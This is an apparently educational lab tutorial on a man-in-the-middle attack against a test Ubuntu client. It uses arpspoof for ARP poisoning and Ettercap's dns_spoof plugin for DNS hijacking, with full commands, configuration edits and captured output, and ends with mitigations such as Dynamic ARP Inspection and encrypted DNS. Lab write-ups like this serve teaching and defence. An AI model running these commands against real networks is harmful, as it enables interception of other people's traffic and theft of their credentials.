MITM attack using Ettercap

Ettercap is a MITM (Man-in-the-Middle) attack suite with a wide range of plugins supporting different attack techniques. This article focuses on a simple ARP poisoning and DNS hijacking attack. For this to work, the involved devices must share Layer 2 connectivity.

Credit: The Ettercap Project

The Man-in-the-Middle attack

The principle of a MITM attack is to insert an attacker into a network or communication path and make the targets believe that it is part of the regular communication relay. There are several different methods to achieve this “trusted imposter” status, many of which are available as plugins in ettercap. This article focuses on two such methods: ARP poisoning and DNS highjacking.

ARP poisoning

ARP (address resolution protocol) is used by devices to map IP addresses to MAC addresses on the local network (layer 2). When a device wants to communicate with another device it broadcasts an ARP request asking “Who has this IP address?”. The device that currently holds the lease to that address responds with it’s MAC address. The first devices stores that information and uses it communicate directly with the target device.

ARP poisoning is performed by continuously sending forged ARP responses to a target device, causing it to update its ARP cache with incorrect IP-to-MAC mappings. As a result, the target device sends traffic intended for another host to the attacker’s device instead.

To illustrate this, consider two devices connected to a router. The first device is the target: an Ubuntu client with the IP address 192.168.1.116. The second device is the attacker: a Kali Linux client with the IP address 192.168.1.112. The default gateway of the network is 192.168.1.1.

The first thing we need to do in preparation is to enable IP forwarding in Kali. Otherwise we’ll just break the Ubuntu Clients connection.

echo 1 | sudo tee /proc/sys/net/ipv4/ip_forward

Now that preparations are complete, we will demonstrate the ARP poisoning by using the command-line tool arpspoof to trick the Ubuntu client into believing that the Kali machine is the default gateway.

sudo arpspoof -i <the interface on the kali machine> -t <target host ip> <ip to impersonate>

Applying the information provided ealier we get this command.

sudo arpspoof -i eth0 -t 192.168.1.116 192.168.1.1

The command sends forged ARP replies to the target 192.168.1.116, assosiating the gateway IP 192.168.1.1 with the attackers MAC address. The output will look something like this.

┌──(lab㉿kali-client-01)-[~]
└─$ sudo arpspoof -i eth0 -t 192.168.1.116 192.168.1.1
bc:24:11:dc:11:a9 bc:24:11:78:13:2a 0806 42: arp reply 192.168.1.1 is-at bc:24:11:dc:11:a9
bc:24:11:dc:11:a9 bc:24:11:78:13:2a 0806 42: arp reply 192.168.1.1 is-at bc:24:11:dc:11:a9
bc:24:11:dc:11:a9 bc:24:11:78:13:2a 0806 42: arp reply 192.168.1.1 is-at bc:24:11:dc:11:a9
bc:24:11:dc:11:a9 bc:24:11:78:13:2a 0806 42: arp reply 192.168.1.1 is-at bc:24:11:dc:11:a9
bc:24:11:dc:11:a9 bc:24:11:78:13:2a 0806 42: arp reply 192.168.1.1 is-at bc:24:11:dc:11:a9

Now we can check if the Ubuntu client has picked up the spoofed address using the arp command-line tool.

lab@ubuntu-client-01:~$ arp -a
router.lab (192.168.1.1) at bc:24:11:dc:11:a9 [ether] on ens18
ubuntu-client-01-1.lab (192.168.1.112) at bc:24:11:dc:11:a9 [ether] on ens18
ns.lab (192.168.1.2) at bc:24:11:8d:34:4d [ether] on ens18

Right now only one direction is being poisoned. For a full MITM setup we need to poison the gateway aswell, this ensures that traffic flows through the attacker instead of just breaking connectivity.

On the Kali Linux client we run another arpspoof instance in a seperate terminal.

sudo arpspoof -i eth0 -t 192.168.1.1 192.168.1.116

To make sure that the MITM attack actually worked we’ll run a tcpdump on the Kali client and listen for tcp-syn packets.

sudo tcpdump -i eth0 -nn 'src 192.168.1.116 and tcp[tcpflags] == tcp-syn'

As soon as the dump is set up and listening we open a browser and enter google.com. If everything is set up correctly it will result in the following output.

┌──(lab㉿kali-client-01)-[~]
└─$ sudo tcpdump -i eth0 -nn 'src 192.168.1.116 and tcp[tcpflags] == tcp-syn'
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on eth0, link-type EN10MB (Ethernet), snapshot length 262144 bytes
21:37:14.052540 IP 192.168.1.116.52546 > 104.20.23.154.80: Flags [S], seq 844398196, win 64240, options [mss 1460,sackOK,TS val 1709947829 ecr 0,nop,wscale 9], length 0
21:37:14.052602 IP 192.168.1.116.52546 > 104.20.23.154.80: Flags [S], seq 844398196, win 64240, options [mss 1460,sackOK,TS val 1709947829 ecr 0,nop,wscale 9], length 0

The duplicate packets observed in the capture are caused by the attacker forwarding traffic between the victim and the gateway. Since tcpdump captures packets both when they arrive and when they are forwarded, each packet appears twice.

Using Ettercap

So far, we have successfully performed an ARP poisoning attack and can observe the network traffic of the target device. The next step in a successful MITM attack is to redirect the target to an attacker-controlled endpoint, where sensitive information such as login credentials can be captured.

DNS highjacking

DNS (Domain Name System) is used by devices to resolve domain names to IP addresses on a network or the internet. Similar to ARP, a device sends a request asking for the IP address associated with a domain name. Unlike ARP, this request is not broadcasted but sent directly to a configured DNS server. In this attack, the request is intercepted and a malicious response is returned instead of the legitimate one.

First we need to configure elevated permissions for ettercap, we do so by modifying the main configuration file.

sudo vim /etc/ettercap/etter.conf

Replace the existing values with 0 which is root.

[privs]
ec_uid = 0
ec_gid = 0

Next we need to tell which requests ettercap should intercept and replace. This is done in ettercaps dns configuration file.

sudo vim /etc/ettercap/etter.dns

Here we create an A record for a makebelieve highjacked webpage called highjacked.example.com.

highjacked.example.com  A   192.168.1.112

Optionally block responses from the gateway in order to avoid race-conditions between spoofed and legitimate DNS responses. Run the following iptables command on the Kali Linux machine.

iptables -A FORWARD -p udp --dport 53 -j DROP

We will want to serve a webpage when the target accesses our highjacked domain. In order to do so we start an instance of an apache2 webserver.

service apache2 start

Now we are ready to execute the actual attack. The command is very similar to the one we used with arpspoof with the addition of the dns_spoof plugin.

sudo ettercap -T -q -i <interface> -M arp:remote //<target IP>// //<gateway IP>// -P <plugin name>

• T launches ettercap in text mode (no GUI)
• q reduces the output from ettercap for easier following
• i specifies the interface to run the attack on
• M bidirectional MITM
• P specifies which plugins to load

Here’s the command using the information of our environment.

sudo ettercap -T -q -i eth0 -M arp:remote //192.168.1.116// //192.168.1.1// -P dns_spoof

Finally we open a browser on the Ubuntu machine and enter our URL highjacked.example.com into the top bar. What appears infront of us is the default page of an unconfigured apache2 webserver. The attack succeeded and we redirected the target to our webpage.

Mitigation Strategies

While the demonstrated attack was effective in a controlled environment, several mechanisms can be employed to defend against it.

At the network layer, ARP poisoning can be mitigated through the use of static ARP entries or Dynamic ARP Inspection (DAI), which prevent spoofed ARP messages and stop attackers from inserting themselves into communication paths.

For DNS, encrypted protocols such as DNS over HTTPS (DoH) and DNS over TLS (DoT) protect queries and responses from interception or manipulation.

Finally, the use of HTTPS and proper certificate validation ensures that even if traffic is intercepted, it cannot be read or modified without detection.